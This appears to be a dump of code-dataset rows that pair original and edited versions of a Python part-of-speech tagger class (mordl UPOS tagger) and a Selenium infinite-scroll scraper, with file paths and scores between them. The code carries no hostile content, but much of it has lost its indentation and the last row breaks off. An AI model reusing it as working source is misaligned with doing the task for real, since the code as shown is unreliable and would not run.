where the first element is the sentence with predicted labels and the
second element is the original sentence. **with_orig** can be `True`
only if **save_to** is `None`.
**batch_size** (`int`; default is `64`): the number of sentences per
batch.
**split** (`int`; default is `None`): the number of lines in sentences
split. Allows to process a large dataset in pieces ("splits"). If
**split** is `None` (default), all the dataset is processed without
splits.
**clone_ds** (`bool`; default is `False`): if `True`, the dataset is
cloned and transformed. If `False`, `transform_collate` is used
without cloning the dataset. There is no big differences between the
variants. Both should produce identical results.
**save_to** (`str`; default is `None`): the file name where the
predictions will be saved.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
Returns the corpus with tags predicted in the UPOS field.
"""
assert self._field == 'UPOS' or use_cdict_coef in [None, False], \
'ERROR: "use_cdict_coef" param may be used only with UPOS field'
args, kwargs = get_func_params(UposTagger.predict, locals())
return super().predict(self._field, None, *args, **kwargs)
def evaluate(self, gold, test=None, label=None, use_cdict_coef=False,
batch_size=BATCH_SIZE, split=None, clone_ds=False,
log_file=LOG_FILE):
"""Evaluate the tagger model.
Args:
**gold**: the corpus of sentences with actual target values to score
the tagger on. May be either the name of the file in *CoNLL-U* format
or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.
**test** (default is `None`): the corpus of sentences with predicted
target values. If `None` (default), the **gold** corpus will be
retagged on-the-fly, and the result will be used as the **test**.
**label** (`str`; default is `None`): the specific label of the target
field to be evaluated separatedly, e.g. `field='UPOS', label='VERB'`
or `field='FEATS:Animacy', label='Inan'`.
**use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
we use our prediction only. If `True`, we replace our prediction to
the value returned by the `corpuscula.CorpusDict.predict_<field>()`
method if its `coef` >= `.99`. Also, you can specify your own
threshold as the value of the param.
**batch_size** (`int`; default is `64`): the number of sentences per
batch.
**split** (`int`; default is `None`): the number of lines in sentences
split. Allows to process a large dataset in pieces ("splits"). If
**split** is `None` (default), all the dataset is processed without
splits.
**clone_ds** (`bool`; default is `False`): if `True`, the dataset is
cloned and transformed. If `False`, `transform_collate` is used
without cloning the dataset. There is no big differences between the
variants. Both should produce identical results.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
The method prints metrics and returns evaluation accuracy.
"""
args, kwargs = get_func_params(UposTagger.evaluate, locals())
return super().evaluate(self._field, *args, **kwargs)
def train(self, save_as,
device=None, control_metric='accuracy', max_epochs=None,
min_epochs=0, bad_epochs=5, batch_size=TRAIN_BATCH_SIZE,
max_grad_norm=None, tags_to_remove=None, word_emb_type='bert',
word_emb_path='xlm-roberta-base', word_transform_kwargs=None,
# BertDataset.transform() (for BERT-descendant models)
# params:
# {'max_len': 0, 'batch_size': 64, 'hidden_ids': '10',
# 'aggregate_hiddens_op': 'cat',
# 'aggregate_subtokens_op': 'absmax', 'to': junky.CPU,
# 'loglevel': 1}
# WordDataset.transform() (for other models) params:
# {'check_lower': True}
stage1_params=None,
# {'lr': .0001, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': 0, 'amsgrad': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage2_params=None,
# {'lr': .001, 'momentum': .9, 'weight_decay': 0,
# 'dampening': 0, 'nesterov': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage3_params={'save_as': None},
# {'save_as': None, 'epochs': 3, 'batch_size': 8,
# 'lr': 2e-5, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': .01, 'amsgrad': False,
# 'num_warmup_steps': 3, 'max_grad_norm': 1.}
stages=[1, 2, 3, 1, 2], save_stages=False, load_from=None,
learn_on_padding=True, remove_padding_intent=False,
seed=None, start_time=None, keep_embs=False, log_file=LOG_FILE,
rnn_emb_dim=None, cnn_emb_dim=None, cnn_kernels=range(1, 7),
emb_bn=True, emb_do=.2,
final_emb_dim=512, pre_bn=True, pre_do=.5,
lstm_layers=1, lstm_do=0, tran_layers=0, tran_heads=8,
post_bn=True, post_do=.4):
"""Creates and trains the UPOS tagger model.
During training, the best model is saved after each successful epoch.
*Training's args*:
**save_as** (`str`): the name using for save the model's head. Refer
to the `.save()` method's help for the broad definition (see the
**name** arg there).
**device** (`str`, default is `None`): the device for the model. E.g.:
'cuda:0'. If `None`, we don't move the model to any device (it is
placed right where it's created).
**control_metric** (`str`; default is `accuracy`): the metric that
control training. Any that is supported by the `junky.train()` method.
In the moment, it is: 'accuracy', 'f1', 'loss', 'precision', and
'recall'.
**max_epochs** (`int`; default is `None`): the maximal number of
epochs for the model's head training (stages types `1` and `2`). If
`None` (default), the training would be linger until **bad_epochs**
has met, but no less than **min_epochs**.
**min_epochs** (`int`; default is `0`): the minimal number of training
epochs for the model's head training (stages types `1` and `2`).
**bad_epochs** (`int`; default is `5`): the maximal allowed number of
bad epochs (epochs when chosen **control_metric** is not became
better) in a row for the model's head training (stages types `1` and
`2`).
**batch_size** (`int`; default is `32`): the number of sentences per
batch for the model's head training (stages types `1` and `2`).
**max_grad_norm** (`float`; default is `None`): the gradient clipping
parameter for the model's head training (stages types `1` and `2`).
**tags_to_remove** (`dict({str: str}) | dict({str: list([str])})`;
default is `None`): the tags, tokens with those must be removed from
the corpus. It's the `dict` with field names as keys and values you
want to remove. Applied only to fields with atomic values (like
UPOS). This argument may be used, for example, to remove some
infrequent or just excess tags from the corpus. Note, that we remove
the tokens from the train corpus completely, not just replace those
tags to `None`.
*Word embedding params*:
**word_emb_type** (`str`; default is `'bert'`): one of (`'bert'` |
`'glove'` | `'ft'` | `'w2v'`) embedding types.
**word_emb_path** (`str`): the path to the word embeddings storage.
**word_transform_kwargs** (`dict`; default is `None`): keyword
arguments for the `.transform()` method of the dataset created for
sentences to word embeddings conversion. See the `.transform()` method
of either `junky.datasets.BertDataset` (if **word_emb_path** is
`'bert'`) or `junky.datasets.WordDataset` (otherwise) if you want to
learn allowed values for the parameter. If `None`, the `.transform()`
method use its defaults.
*Training stages params*:
**stage1_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_train()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `1`.
**stage2_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_tune()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `2`.
**stage3_param** (`dict`; default is `None`): keyword arguments for
the `WordEmbeddings.full_tune()` method. If `None`, the defaults are
used.
**stages** (`list([int]`; default is `[1, 2, 3, 1, 2]`): what stages
we should use during training and in which order. On the stage type
`1` the model head is trained with *Adam* optimizer; the stage type
`2` is similar, but the optimizer is *SGD*; the stage type `3` is only
relevant when **word_emb_type** is `'bert'` and we want to tune the
whole model. Stage type `0` defines the skip-stage, i.e. there would
be no real training on it. It is used when you need reproducibility
and want to continue train the model from some particular stage. In
this case, you specify the name of the model saved on that stage in
the parametere **load_from**, and put zeros into the **stages** list
on the places of already finished ones. One more time: it is used for
reproducibility only, i.e. when you put some particular value to the
**seed** param and want the data order in bathes be equivalent with
data on the stages from the past trainings.
**save_stages** (`bool`; default is `False`): if we need to keep the
best model of each stage beside of the overall best model. The names
of these models would have the suffix `_<idx>(stage<stage_type>)`
where `<idx>` is an ordinal number of the stage. We can then use it to
continue training from any particular stage number (changing next
stages or their parameters) using the parameter **load_from**. Note
that we save only stages of the head model. The embedding model as a
part of the full model usually tune only once, so we don't make its
copy.
**load_from** (`str`; default is `None`): if you want to continue
training from one of previously saved stages, you can specify the name
of the model from that stage. Note, that if your model is already
trained on stage type `3`, then you want to set param
**word_emb_path** to `None`. Otherwise, you'll load wrong embedding
model. Any other params of the model may be overwritten (and most
likely, this would cause error), but they are equivalent when the
training is just starts and when it's continues. But the
**word_emb_path** is different if you already passed stage type `3`,
so don't forget to set it to `None` in that case. (Example: you want
to repeat training on stage no `5`, so you specify in the
**load_from** param something like `'model_4(stage1)'` and set the
**word_emb_path** to `None` and the **stages_param** to
`'[0, 0, 0, 0, 2]'` (or, if you don't care of reproducibility, you
could just specify `[2]` here).
*Other options*:
**learn_on_padding** (`bool`; default is `True`): while training, we
can calculate loss either taking in account predictions made for
padding tokens or without it. The common practice is don't use padding
when calculate loss. However, we note that using padding sometimes
makes the resulting model performance slightly better.
**remove_padding_intent** (`bool`; default is `False`): if you set
**learn_on_padding** param to `False`, you may want not to use padding
intent during training at all. I.e. padding tokens would be tagged
with some of real tags, and they would just ignored during computing
loss. As a result, the model would have the output dimensionality of
the final layer less by one. On the first sight, such approach could
increase the performance, but in our experiments, such effect appeared
not always.
**seed** (`int`; default is `None`): init value for the random number
generator if you need reproducibility. Note that each stage will have
its own seed value, and the **seed** param is used to calculate these
values.
**start_time** (`float`; default is `None`): the result of
`time.time()` to start with. If `None`, the arg will be init anew.
**keep_embs** (`bool`; default is `False`): by default, after creating
`Dataset` objects, we remove word embedding models to free memory.
With `keep_embs=False` this operation is omitted, and you can use
`.embs` attribute for share embedding models with other objects.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
*The model hyperparameters*:
**rnn_emb_dim** (`int`; default is `None`): the internal character RNN
(LSTM) embedding dimensionality. If `None`, the layer is skipped.
**cnn_emb_dim** (`int`; default is `None`): the internal character CNN
embedding dimensionality. If `None`, the layer is skipped.
**cnn_kernels** (`list([int])`; default is `[1, 2, 3, 4, 5, 6]`): CNN
kernel sizes of the internal CNN embedding layer. Relevant if
**cnn_emb_dim** is not `None`.
**emb_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the embedding concatenation.
**emb_do** (`float`; default is `.2`): the dropout rate after the
embedding concatenation.
**final_emb_dim** (`int`; default is `512`): the output dimesionality
of the linear transformation applying to concatenated embeddings.
**pre_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied before the main part of the algorithm.
**pre_do** (`float`; default is `.5`): the dropout rate before the
main part of the algorithm.
**lstm_layers** (`int`; default is `1`): the number of Bidirectional
LSTM layers. If `None`, they are not created.
**lstm_do** (`float`; default is `0`): the dropout between LSTM
layers. Only relevant, if `lstm_layers` > `1`.
**tran_layers** (`int`; default is `None`): the number of Transformer
Encoder layers. If `None`, they are not created.
**tran_heads** (`int`; default is `8`): the number of attention heads
of Transformer Encoder layers. Only relevant, if `tran_layers` > `1`.
**post_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the main part of the algorithm.
**post_do** (`float`; default is `.4`): the dropout rate after the
main part of the algorithm.
The method returns the train statistics.
"""
if not start_time:
start_time = time.time()
args, kwargs = get_func_params(UposTagger.train, locals())
self._cdict = CorpusDict(
corpus=(x for x in [self._train_corpus,
self._test_corpus if self._test_corpus else
[]]
for x in x),
format='conllu_parsed', log_file=log_file
)
return super().train(self._field, None, UposTaggerModel, None,
*args, **kwargs) | mordl/upos_tagger.py | from corpuscula import CorpusDict
from junky import get_func_params
from mordl.base_tagger import BaseTagger
from mordl.defaults import BATCH_SIZE, CDICT_COEF_THRESH ,LOG_FILE, \
TRAIN_BATCH_SIZE
from mordl.upos_tagger_model import UposTaggerModel
import time
_CDICT_COEF_THRESH = .99
class UposTagger(BaseTagger):
"""
The UPOS tagger class.
Args:
**field** (`str`; default is `UPOS`): the name of the *CoNLL-U* field,
values of which needs to be predicted. With this tagger, you can predict
only fields with atomic values, like UPOS.
**embs** (`dict({str: object})`; default is `None`): the `dict` with paths
to embeddings files as keys and corresponding embedding models as values.
If the tagger needs to load any embedding model, the model is first
looked up in that `dict`.
During init, **embs** is copied to the `embs` attribute of the creating
object, and this attribute may be used further to share already loaded
embeddings with another taggers.
"""
def __init__(self, field='UPOS', embs=None):
    """Create the tagger.

    Args:

    **field** (`str`): the *CoNLL-U* field this tagger predicts.

    **embs** (`dict` | `None`): mapping of embedding file paths to already
    loaded embedding models, shared through the base class.
    """
    super().__init__(embs=embs)
    self._field = field
def load(self, name, device=None,
         dataset_emb_path=None, dataset_device=None, log_file=LOG_FILE):
    """Loads tagger's internal state saved by its `.save()` method.

    Args:

    **name** (`str`): the name of the previously saved internal state.

    **device** (`str`; default is `None`): the device for the loaded model
    if you want to override the value from the config.

    **dataset_emb_path** (`str`; default is `None`): the path where the
    dataset's embeddings to load from if you want to override the value
    from the config.

    **dataset_device** (`str`; default is `None`): the device for the
    loaded dataset if you want to override the value from the config.

    **log_file** (`file`; default is `sys.stdout`): the stream for info
    messages.
    """
    # get_func_params() snapshots this frame's locals(); it must be
    # called before any other local variables are created, otherwise
    # they would leak into the forwarded kwargs.
    args, kwargs = get_func_params(UposTagger.load, locals())
    super().load(UposTaggerModel, *args, **kwargs)
def _check_cdict(self, sentence, use_cdict_coef):
    """Overwrite UPOS tags with corpus-dictionary predictions when the
    dictionary is confident enough.

    :param sentence: a *Parsed CoNLL-U* sentence, or a tuple whose first
        element is that sentence.
    :param use_cdict_coef: `None`/`False` disables the check; `True` uses
        the default `CDICT_COEF_THRESH` threshold; a `float` is used as a
        custom confidence threshold.
    :return: the sentence (tokens are mutated in place).
    """
    if use_cdict_coef in [None, False]:
        return sentence
    # Resolve the confidence threshold once up front.
    threshold = CDICT_COEF_THRESH if use_cdict_coef is True else \
                use_cdict_coef
    tokens = sentence[0] if isinstance(sentence, tuple) else sentence
    first = True
    for token in tokens:
        form, id_ = token['FORM'], token['ID']
        # Skip empty forms and multiword-token ranges (IDs like '1-2').
        if not form or '-' in id_:
            continue
        guess, coef = self._cdict.predict_tag(form, isfirst=first)
        first = False
        if coef is not None and coef >= threshold:
            token['UPOS'] = guess
    return sentence
def predict(self, corpus, use_cdict_coef=False, with_orig=False,
            batch_size=BATCH_SIZE, split=None, clone_ds=False,
            save_to=None, log_file=LOG_FILE):
    """Predicts tags in the UPOS field of the corpus.

    Args:

    **corpus**: the corpus which will be used for the feature extraction
    and predictions. May be either the name of the file in *CoNLL-U*
    format or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.

    **use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
    we use our prediction only. If `True`, we replace our prediction with
    the value returned by the `corpuscula.CorpusDict.predict_<field>()`
    method if its `coef` >= `.99`. Also, you can specify your own
    threshold as the value of the param.

    **with_orig** (`bool`; default is `False`): if `True`, instead of just
    the sequence with predicted labels, return the sequence of tuples
    where the first element is the sentence with predicted labels and the
    second element is the original sentence. **with_orig** can be `True`
    only if **save_to** is `None`.

    **batch_size** (`int`; default is `64`): the number of sentences per
    batch.

    **split** (`int`; default is `None`): the number of lines in sentences
    split. Allows to process a large dataset in pieces ("splits"). If
    **split** is `None` (default), all the dataset is processed without
    splits.

    **clone_ds** (`bool`; default is `False`): if `True`, the dataset is
    cloned and transformed. If `False`, `transform_collate` is used
    without cloning the dataset. There is no big difference between the
    variants. Both should produce identical results.

    **save_to** (`str`; default is `None`): the file name where the
    predictions will be saved.

    **log_file** (`file`; default is `sys.stdout`): the stream for info
    messages.

    Returns the corpus with tags predicted in the UPOS field.
    """
    # The cdict shortcut predicts UPOS specifically, so it is valid only
    # when this tagger instance actually targets the UPOS field.
    assert self._field == 'UPOS' or use_cdict_coef in [None, False], \
        'ERROR: "use_cdict_coef" param may be used only with UPOS field'
    # get_func_params() snapshots this frame's locals(); keep this call
    # before any new local variables are introduced.
    args, kwargs = get_func_params(UposTagger.predict, locals())
    return super().predict(self._field, None, *args, **kwargs)
def evaluate(self, gold, test=None, label=None, use_cdict_coef=False,
             batch_size=BATCH_SIZE, split=None, clone_ds=False,
             log_file=LOG_FILE):
    """Evaluate the tagger model.

    Args:

    **gold**: the corpus of sentences with actual target values to score
    the tagger on. May be either the name of the file in *CoNLL-U* format
    or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.

    **test** (default is `None`): the corpus of sentences with predicted
    target values. If `None` (default), the **gold** corpus will be
    retagged on-the-fly, and the result will be used as the **test**.

    **label** (`str`; default is `None`): the specific label of the target
    field to be evaluated separately, e.g. `field='UPOS', label='VERB'`
    or `field='FEATS:Animacy', label='Inan'`.

    **use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
    we use our prediction only. If `True`, we replace our prediction with
    the value returned by the `corpuscula.CorpusDict.predict_<field>()`
    method if its `coef` >= `.99`. Also, you can specify your own
    threshold as the value of the param.

    **batch_size** (`int`; default is `64`): the number of sentences per
    batch.

    **split** (`int`; default is `None`): the number of lines in sentences
    split. Allows to process a large dataset in pieces ("splits"). If
    **split** is `None` (default), all the dataset is processed without
    splits.

    **clone_ds** (`bool`; default is `False`): if `True`, the dataset is
    cloned and transformed. If `False`, `transform_collate` is used
    without cloning the dataset. There is no big difference between the
    variants. Both should produce identical results.

    **log_file** (`file`; default is `sys.stdout`): the stream for info
    messages.

    The method prints metrics and returns evaluation accuracy.
    """
    # get_func_params() snapshots this frame's locals(); keep this call
    # before any new local variables are introduced.
    args, kwargs = get_func_params(UposTagger.evaluate, locals())
    return super().evaluate(self._field, *args, **kwargs)
def train(self, save_as,
device=None, control_metric='accuracy', max_epochs=None,
min_epochs=0, bad_epochs=5, batch_size=TRAIN_BATCH_SIZE,
max_grad_norm=None, tags_to_remove=None, word_emb_type='bert',
word_emb_path='xlm-roberta-base', word_transform_kwargs=None,
# BertDataset.transform() (for BERT-descendant models)
# params:
# {'max_len': 0, 'batch_size': 64, 'hidden_ids': '10',
# 'aggregate_hiddens_op': 'cat',
# 'aggregate_subtokens_op': 'absmax', 'to': junky.CPU,
# 'loglevel': 1}
# WordDataset.transform() (for other models) params:
# {'check_lower': True}
stage1_params=None,
# {'lr': .0001, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': 0, 'amsgrad': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage2_params=None,
# {'lr': .001, 'momentum': .9, 'weight_decay': 0,
# 'dampening': 0, 'nesterov': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage3_params={'save_as': None},
# {'save_as': None, 'epochs': 3, 'batch_size': 8,
# 'lr': 2e-5, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': .01, 'amsgrad': False,
# 'num_warmup_steps': 3, 'max_grad_norm': 1.}
stages=[1, 2, 3, 1, 2], save_stages=False, load_from=None,
learn_on_padding=True, remove_padding_intent=False,
seed=None, start_time=None, keep_embs=False, log_file=LOG_FILE,
rnn_emb_dim=None, cnn_emb_dim=None, cnn_kernels=range(1, 7),
emb_bn=True, emb_do=.2,
final_emb_dim=512, pre_bn=True, pre_do=.5,
lstm_layers=1, lstm_do=0, tran_layers=0, tran_heads=8,
post_bn=True, post_do=.4):
"""Creates and trains the UPOS tagger model.
During training, the best model is saved after each successful epoch.
*Training's args*:
**save_as** (`str`): the name using for save the model's head. Refer
to the `.save()` method's help for the broad definition (see the
**name** arg there).
**device** (`str`, default is `None`): the device for the model. E.g.:
'cuda:0'. If `None`, we don't move the model to any device (it is
placed right where it's created).
**control_metric** (`str`; default is `accuracy`): the metric that
control training. Any that is supported by the `junky.train()` method.
In the moment, it is: 'accuracy', 'f1', 'loss', 'precision', and
'recall'.
**max_epochs** (`int`; default is `None`): the maximal number of
epochs for the model's head training (stages types `1` and `2`). If
`None` (default), the training would be linger until **bad_epochs**
has met, but no less than **min_epochs**.
**min_epochs** (`int`; default is `0`): the minimal number of training
epochs for the model's head training (stages types `1` and `2`).
**bad_epochs** (`int`; default is `5`): the maximal allowed number of
bad epochs (epochs when chosen **control_metric** is not became
better) in a row for the model's head training (stages types `1` and
`2`).
**batch_size** (`int`; default is `32`): the number of sentences per
batch for the model's head training (stages types `1` and `2`).
**max_grad_norm** (`float`; default is `None`): the gradient clipping
parameter for the model's head training (stages types `1` and `2`).
**tags_to_remove** (`dict({str: str}) | dict({str: list([str])})`;
default is `None`): the tags, tokens with those must be removed from
the corpus. It's the `dict` with field names as keys and values you
want to remove. Applied only to fields with atomic values (like
UPOS). This argument may be used, for example, to remove some
infrequent or just excess tags from the corpus. Note, that we remove
the tokens from the train corpus completely, not just replace those
tags to `None`.
*Word embedding params*:
**word_emb_type** (`str`; default is `'bert'`): one of (`'bert'` |
`'glove'` | `'ft'` | `'w2v'`) embedding types.
**word_emb_path** (`str`): the path to the word embeddings storage.
**word_transform_kwargs** (`dict`; default is `None`): keyword
arguments for the `.transform()` method of the dataset created for
sentences to word embeddings conversion. See the `.transform()` method
of either `junky.datasets.BertDataset` (if **word_emb_path** is
`'bert'`) or `junky.datasets.WordDataset` (otherwise) if you want to
learn allowed values for the parameter. If `None`, the `.transform()`
method use its defaults.
*Training stages params*:
**stage1_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_train()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `1`.
**stage2_param** (`dict`; default is `None`): keyword arguments for
the `BaseModel.adjust_model_for_tune()` method. If `None`, the
defaults are used. Also, you can specify here new values for the
arguments **max_epochs**, **min_epochs**, **bad_epochs**,
**batch_size**, and **max_grad_norm** that will be used only on stages
of type `2`.
**stage3_param** (`dict`; default is `None`): keyword arguments for
the `WordEmbeddings.full_tune()` method. If `None`, the defaults are
used.
**stages** (`list([int]`; default is `[1, 2, 3, 1, 2]`): what stages
we should use during training and in which order. On the stage type
`1` the model head is trained with *Adam* optimizer; the stage type
`2` is similar, but the optimizer is *SGD*; the stage type `3` is only
relevant when **word_emb_type** is `'bert'` and we want to tune the
whole model. Stage type `0` defines the skip-stage, i.e. there would
be no real training on it. It is used when you need reproducibility
and want to continue train the model from some particular stage. In
this case, you specify the name of the model saved on that stage in
the parameter **load_from**, and put zeros into the **stages** list
on the places of already finished ones. One more time: it is used for
reproducibility only, i.e. when you put some particular value to the
**seed** param and want the data order in batches be equivalent with
data on the stages from the past trainings.
**save_stages** (`bool`; default is `False`): if we need to keep the
best model of each stage beside of the overall best model. The names
of these models would have the suffix `_<idx>(stage<stage_type>)`
where `<idx>` is an ordinal number of the stage. We can then use it to
continue training from any particular stage number (changing next
stages or their parameters) using the parameter **load_from**. Note
that we save only stages of the head model. The embedding model as a
part of the full model usually tune only once, so we don't make its
copy.
**load_from** (`str`; default is `None`): if you want to continue
training from one of previously saved stages, you can specify the name
of the model from that stage. Note, that if your model is already
trained on stage type `3`, then you want to set param
**word_emb_path** to `None`. Otherwise, you'll load wrong embedding
model. Any other params of the model may be overwritten (and most
likely, this would cause error), but they are equivalent when the
training is just starts and when it's continues. But the
**word_emb_path** is different if you already passed stage type `3`,
so don't forget to set it to `None` in that case. (Example: you want
to repeat training on stage no `5`, so you specify in the
**load_from** param something like `'model_4(stage1)'` and set the
**word_emb_path** to `None` and the **stages_param** to
`'[0, 0, 0, 0, 2]'` (or, if you don't care of reproducibility, you
could just specify `[2]` here).
*Other options*:
**learn_on_padding** (`bool`; default is `True`): while training, we
can calculate loss either taking in account predictions made for
padding tokens or without it. The common practice is don't use padding
when calculate loss. However, we note that using padding sometimes
makes the resulting model performance slightly better.
**remove_padding_intent** (`bool`; default is `False`): if you set
**learn_on_padding** param to `False`, you may want not to use padding
intent during training at all. I.e. padding tokens would be tagged
with some of real tags, and they would just ignored during computing
loss. As a result, the model would have the output dimensionality of
the final layer less by one. On the first sight, such approach could
increase the performance, but in our experiments, such effect appeared
not always.
**seed** (`int`; default is `None`): init value for the random number
generator if you need reproducibility. Note that each stage will have
its own seed value, and the **seed** param is used to calculate these
values.
**start_time** (`float`; default is `None`): the result of
`time.time()` to start with. If `None`, the arg will be init anew.
**keep_embs** (`bool`; default is `False`): by default, after creating
`Dataset` objects, we remove word embedding models to free memory.
With `keep_embs=False` this operation is omitted, and you can use
`.embs` attribute for share embedding models with other objects.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
*The model hyperparameters*:
**rnn_emb_dim** (`int`; default is `None`): the internal character RNN
(LSTM) embedding dimensionality. If `None`, the layer is skipped.
**cnn_emb_dim** (`int`; default is `None`): the internal character CNN
embedding dimensionality. If `None`, the layer is skipped.
**cnn_kernels** (`list([int])`; default is `[1, 2, 3, 4, 5, 6]`): CNN
kernel sizes of the internal CNN embedding layer. Relevant if
**cnn_emb_dim** is not `None`.
**emb_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the embedding concatenation.
**emb_do** (`float`; default is `.2`): the dropout rate after the
embedding concatenation.
**final_emb_dim** (`int`; default is `512`): the output dimensionality
of the linear transformation applying to concatenated embeddings.
**pre_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied before the main part of the algorithm.
**pre_do** (`float`; default is `.5`): the dropout rate before the
main part of the algorithm.
**lstm_layers** (`int`; default is `1`): the number of Bidirectional
LSTM layers. If `None`, they are not created.
**lstm_do** (`float`; default is `0`): the dropout between LSTM
layers. Only relevant, if `lstm_layers` > `1`.
**tran_layers** (`int`; default is `None`): the number of Transformer
Encoder layers. If `None`, they are not created.
**tran_heads** (`int`; default is `8`): the number of attention heads
of Transformer Encoder layers. Only relevant, if `tran_layers` > `1`.
**post_bn** (`bool`; default is `True`): whether batch normalization
layer should be applied after the main part of the algorithm.
**post_do** (`float`; default is `.4`): the dropout rate after the
main part of the algorithm.
The method returns the train statistics.
"""
if not start_time:
start_time = time.time()
args, kwargs = get_func_params(UposTagger.train, locals())
self._cdict = CorpusDict(
corpus=(x for x in [self._train_corpus,
self._test_corpus if self._test_corpus else
[]]
for x in x),
format='conllu_parsed', log_file=log_file
)
return super().train(self._field, None, UposTaggerModel, None,
*args, **kwargs) | 0.866683 | 0.341143 |
import os
import time
from random import randint
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from urllib3 import ProxyManager, make_headers, PoolManager, disable_warnings
from selenium import webdriver
class InfinityRequester:
def __init__(self, url,parent_element, parent_element_classes, child_element, child_element_classes,
             url_classes=None):
    """Scraper for infinite-scroll pages, backed by a headless Chrome driver.

    :param url: resource (page URL) to load
    :param parent_element: tag name of the container element
    :param parent_element_classes: list of CSS classes of the container
    :param child_element: tag name of the repeated child elements
    :param child_element_classes: list of CSS classes of the children
    :param url_classes: CSS classes of the `<a>` tag inside each child
        whose `href` is used as the result key (optional)
    """
    # The chromedriver binary is expected at ./drivers/chromedriver_win
    # next to this file — TODO confirm for non-Windows environments.
    dir_path = os.path.dirname(os.path.realpath(__file__))
    chromedriver = os.path.join(dir_path, 'drivers', 'chromedriver_win')
    options = webdriver.ChromeOptions()
    options.add_argument('headless')
    options.add_argument('window-size=1200x400')  # optional
    # NOTE(review): `executable_path`/`chrome_options` are deprecated in
    # Selenium 4 — fine only if the project pins Selenium 3.
    self.__browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)
    self.__url = url
    self.__parent_element=parent_element
    self.__parent_element_classes=parent_element_classes
    self.__child_element=child_element
    self.__child_element_classes=child_element_classes
    self.__url_classes = url_classes
def __get_elements(self, html_content):
    """Extract child elements keyed by the URL of their inner link.

    :param html_content: HTML of the loaded page
    :return: dictionary {'url': html_child_content, ...}
    """
    result = dict()
    soup = BeautifulSoup(html_content, 'html.parser')
    parent = soup.find(self.__parent_element, {'class': self.__parent_element_classes})
    # bs4 returns None when nothing matches; previously this crashed with
    # an AttributeError on pages without the container.
    if parent is None:
        return result
    childs = parent.find_all(self.__child_element, {'class': self.__child_element_classes})
    # url extraction
    for child in childs:
        url = child.find('a', {'class': self.__url_classes})
        # Skip children without a matching anchor or without an href,
        # instead of raising on url['href'].
        if url is None or not url.has_attr('href'):
            continue
        result[url['href']] = child
    return result
def make_get_request(self):
"""
:return: dictionary {'url': html_child_content,...}
"""
self.__browser.get(self.__url)
html_content = self.__browser.page_source
elements = self.__get_elements(html_content)
SCROLL_PAUSE_TIME = 1
last_height = self.__browser.execute_script("return document.body.scrollHeight")
new_height = 0
while new_height != last_height:
last_height = new_height
# Scroll down to bottom
self.__browser.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# upload data
html_content = self.__browser.page_source
elements.update(
self.__get_elements(html_content)
)
# Calculate new scroll height and compare with last scroll height
new_height = self.__browser.execute_script("return document.body.scrollHeight")
# TODO delete all prints
print('Scrolling...')
return elements | Requests/InfinityRequester.py | import os
import time
from random import randint
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from urllib3 import ProxyManager, make_headers, PoolManager, disable_warnings
from selenium import webdriver
class InfinityRequester:
def __init__(self, url,parent_element, parent_element_classes, child_element, child_element_classes,
             url_classes=None):
    """Scraper for infinite-scroll pages, backed by a headless Chrome driver.

    :param url: resource (page URL) to load
    :param parent_element: tag name of the container element
    :param parent_element_classes: list of CSS classes of the container
    :param child_element: tag name of the repeated child elements
    :param child_element_classes: list of CSS classes of the children
    :param url_classes: CSS classes of the `<a>` tag inside each child
        whose `href` is used as the result key (optional)
    """
    # The chromedriver binary is expected at ./drivers/chromedriver_win
    # next to this file — TODO confirm for non-Windows environments.
    dir_path = os.path.dirname(os.path.realpath(__file__))
    chromedriver = os.path.join(dir_path, 'drivers', 'chromedriver_win')
    options = webdriver.ChromeOptions()
    options.add_argument('headless')
    options.add_argument('window-size=1200x400')  # optional
    # NOTE(review): `executable_path`/`chrome_options` are deprecated in
    # Selenium 4 — fine only if the project pins Selenium 3.
    self.__browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)
    self.__url = url
    self.__parent_element=parent_element
    self.__parent_element_classes=parent_element_classes
    self.__child_element=child_element
    self.__child_element_classes=child_element_classes
    self.__url_classes = url_classes
def __get_elements(self, html_content):
    """Extract child elements keyed by the URL of their inner link.

